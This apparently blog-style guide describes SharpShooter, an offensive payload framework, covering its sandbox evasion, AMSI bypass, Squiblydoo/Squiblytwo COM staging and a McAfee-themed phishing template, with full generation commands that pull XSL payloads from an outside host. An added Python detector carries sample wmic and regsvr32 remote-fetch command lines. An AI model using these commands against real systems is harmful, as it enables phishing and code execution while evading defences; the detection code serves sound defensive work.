Introduction
The widespread use of PowerShell in attacks means that PowerShell activity is now much better logged and detected. PowerShell is flexible, but attackers needed alternatives, and many turned to C# and the .NET utilities to execute code on Windows. That is how SharpShooter, a payload generation framework, came about.
SharpShooter is a weaponised payload generation framework with anti-sandbox analysis, staged and stageless payload execution and support for evading ingress monitoring.
Payload Generation Framework: SharpShooter
SharpShooter is a payload generation framework for the retrieval and execution of arbitrary CSharp source code. The framework leverages James Forshaw's DotNetToJavaScript tool and can create payloads in a wide variety of formats:
- HTA, JS, VBS, JSE, VBA, VBE and WSF.
Features:
- Sandbox Detection: several default techniques to evade detection, including identifying tools.
- Stageless Execution: with the ability to inject in-memory shellcode directly into the process, the framework supports a fully fileless mode.
- XSL Exploitation (Squiblytwo): bypasses signatures and security solutions by executing XSL (eXtensible Stylesheet Language) full-trust scripts from the WMIC command line.
- Squiblydoo and Squiblytwo support: COM staging and XSL exploitation directly through COM.
- AMSI Bypass: uses an XPath expression in the XSL file to bypass the Windows Defender AMSI signature.
Sandbox Detection
SharpShooter ships with several default techniques for evading detection, including identifying tools, and you can choose some or all of them. The payload will not execute if the conditions of the selected sandbox detection techniques are met.
- Key to Domain: the payload will only execute on a specific domain.
- Ensure Domain Joined: the payload will only execute if the workstation is domain joined.
- Check for Sandbox Artifacts: searches the file system for artifacts of known sandbox technologies and virtualisation systems; if any are found, the payload will not execute.
- Check for Bad MACs: checks the MAC address of the system; if the vendor matches known virtualisation software, the payload will not execute.
- Check for Debugging: if the payload is being debugged, it will not execute.
Stageless Execution
SharpShooter supports both staged and stageless payload execution. With the ability to inject in-memory shellcode directly into the process, the framework supports a fully fileless mode.
- McAfee HTML template: if the user clicks the phishing link, the JavaScript file is opened and the shellcode is executed.
Squiblydoo and Squiblytwo
SharpShooter supports the Squiblydoo and Squiblytwo attacks.
- One-liners using a COM interface (COM Staging):
SharpShooter creates either an XSL- or SCT-hosted payload, and the script-based payload is a COM stager in HTA, VBS, JS, WSF or a similar format that executes either wmic.exe or regsvr32.exe.
The following command generates this with SharpShooter:
python SharpShooter.py --stageless --dotnetver 2 --payload vbs --output foo --rawscfile ./x86payload.bin --smuggle --template mcafee --com outlook -awl wmic --awlurl http://192.168.2.8:8080/foo.xsl
- XSL Exploitation directly through COM
The benefit of this technique is that it avoids some of the indicators associated with the wmic.exe and regsvr32.exe techniques; in particular, there is no risk of being detected through command-line logging.
This technique can be used by running:
python SharpShooter.py --stageless --dotnetver 2 --payload vbs --output foo --rawscfile ./x64payload.bin --smuggle --template mcafee --com xslremote --awlurl http://192.168.2.8:8080/foo.xsl
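The previous paragraph points out that the wmic.exe and regsvr32.exe variants of these techniques are exposed to command-line logging. The following Python script is an added example, not part of the original post or of the SharpShooter project: it scans process-creation events for exactly those indicators, wmic.exe with /format: pointing at an XSL stylesheet and regsvr32.exe with /i: fetching a remote scriptlet through scrobj.dll, and raises the weight when the parent is a script host or Office application. The event layout, the parent-process list and the sample events are assumptions made for the example; the events are constructed, not real telemetry.

```python
"""Scan process-creation events for the wmic.exe / regsvr32.exe patterns that
the Squiblytwo and Squiblydoo COM staging techniques leave in command-line logs.
Added example; field layout, host list and sample events are assumptions."""
import re

# Constructed sample events (not real telemetry). Layout assumed for the example:
# image=<path> parent=<exe> cmdline="<command line>"
SAMPLE_EVENTS = [
    r'image=C:\Windows\System32\wbem\WMIC.exe parent=wscript.exe cmdline="wmic os get /format:\"http://192.168.2.8:8080/foo.xsl\""',
    r'image=C:\Windows\System32\regsvr32.exe parent=mshta.exe cmdline="regsvr32 /s /n /u /i:http://192.168.2.8:8080/foo.sct scrobj.dll"',
    r'image=C:\Windows\System32\wbem\WMIC.exe parent=cmd.exe cmdline="wmic os get caption"',
    r'image=C:\Windows\System32\regsvr32.exe parent=msiexec.exe cmdline="regsvr32 /s C:\Program Files\Vendor\comp.dll"',
    r'image=C:\Windows\System32\wbem\WMIC.exe parent=winword.exe cmdline="wmic process list /format:C:\Users\Public\x.xsl"',
]

EVENT_RE = re.compile(r'image=(?P<image>\S+)\s+parent=(?P<parent>\S+)\s+cmdline="(?P<cmdline>.*)"$')
REMOTE_RE = re.compile(r'^https?://', re.IGNORECASE)
# Parents that rarely have a legitimate reason to launch wmic/regsvr32 (assumed list).
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "outlook.exe",
                "winword.exe", "excel.exe", "powerpnt.exe"}


def parse_event(line):
    """Return a dict with image, parent and cmdline, or None if the line does not match."""
    m = EVENT_RE.match(line.strip())
    return m.groupdict() if m else None


def analyze(event):
    """Return the list of reasons an event is suspicious (empty list when benign)."""
    reasons = []
    image = event["image"].rsplit("\\", 1)[-1].lower()
    cmd = event["cmdline"]
    if image == "wmic.exe":
        m = re.search(r'/format:(\S+)', cmd, re.IGNORECASE)
        if m:
            target = m.group(1).strip('\\"')  # drop escaped quotes around the value
            if REMOTE_RE.match(target):
                reasons.append("wmic /format: loads a remote XSL stylesheet (Squiblytwo)")
            elif target.lower().endswith(".xsl") and "\\windows\\" not in target.lower():
                reasons.append("wmic /format: loads a local .xsl outside the Windows directory")
    elif image == "regsvr32.exe":
        if re.search(r'/i:\S*https?://', cmd, re.IGNORECASE) and "scrobj.dll" in cmd.lower():
            reasons.append("regsvr32 /i: fetches a remote scriptlet via scrobj.dll (Squiblydoo)")
    # A script host or Office parent makes an already suspicious launch more so.
    if reasons and event["parent"].lower() in SCRIPT_HOSTS:
        reasons.append(f"launched by script/Office host {event['parent']}")
    return reasons


def scan(lines):
    """Return [(index, reasons)] for every parsable event that produced at least one reason."""
    hits = []
    for i, line in enumerate(lines):
        event = parse_event(line)
        if event and (reasons := analyze(event)):
            hits.append((i, reasons))
    return hits


if __name__ == "__main__":
    for i, reasons in scan(SAMPLE_EVENTS):
        print(f"event {i}: " + "; ".join(reasons))
```

Running the script flags the two remote-fetch events and the wmic call that loads a user-writable .xsl, while the plain `wmic os get caption` and the local DLL registration pass. Note the limit the text itself states: the xslremote COM variant never launches wmic.exe or regsvr32.exe, so command-line rules like these do not see it, and coverage for that variant has to come from elsewhere (for example, the network request for the .xsl file or in-process script execution telemetry).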
Install
Clone it from GitHub:
git clone https://github.com/mdsecactivebreach/SharpShooter.git
Usage
To see the available options, methods and techniques, just run it with --help:
usage: SharpShooter.py [-h] [--stageless] [--dotnetver <ver>] [--com <com>]
                       [--awl <awl>] [--awlurl <awlurl>] [--payload <format>]
                       [--sandbox <types>] [--amsi <amsi>] [--delivery <type>]
                       [--rawscfile <path>] [--shellcode] [--scfile <path>]
                       [--refs <refs>] [--namespace <ns>] [--entrypoint <ep>]
                       [--web <web>] [--dns <dns>] [--output <output>]
                       [--smuggle] [--template <tpl>]

optional arguments:
  -h, --help          show this help message and exit
  --stageless         Create a stageless payload
  --dotnetver <ver>   Target .NET Version: 2 or 4
  --com <com>         COM Staging Technique: outlook, shellbrowserwin, wmi, wscript, xslremote
  --awl <awl>         Application Whitelist Bypass Technique: wmic, regsvr32
  --awlurl <awlurl>   URL to retrieve XSL/SCT payload
  --payload <format>  Payload type: hta, js, jse, vba, vbe, vbs, wsf
  --sandbox <types>   Anti-sandbox techniques:
                      [1] Key to Domain (e.g. 1=CONTOSO)
                      [2] Ensure Domain Joined
                      [3] Check for Sandbox Artifacts
                      [4] Check for Bad MACs
                      [5] Check for Debugging
  --amsi <amsi>       Use amsi bypass technique: amsienable
  --delivery <type>   Delivery method: web, dns, both
  --rawscfile <path>  Path to raw shellcode file for stageless payloads
  --shellcode         Use built in shellcode execution
  --scfile <path>     Path to shellcode file as CSharp byte array
  --refs <refs>       References required to compile custom CSharp, e.g. mscorlib.dll,System.Windows.Forms.dll
  --namespace <ns>    Namespace for custom CSharp, e.g. Foo.bar
  --entrypoint <ep>   Method to execute, e.g. Main
  --web <web>         URI for web delivery
  --dns <dns>         Domain for DNS delivery
  --output <output>   Name of output file (e.g. maldoc)
  --smuggle           Smuggle file inside HTML
  --template <tpl>    Name of template file (e.g. mcafee)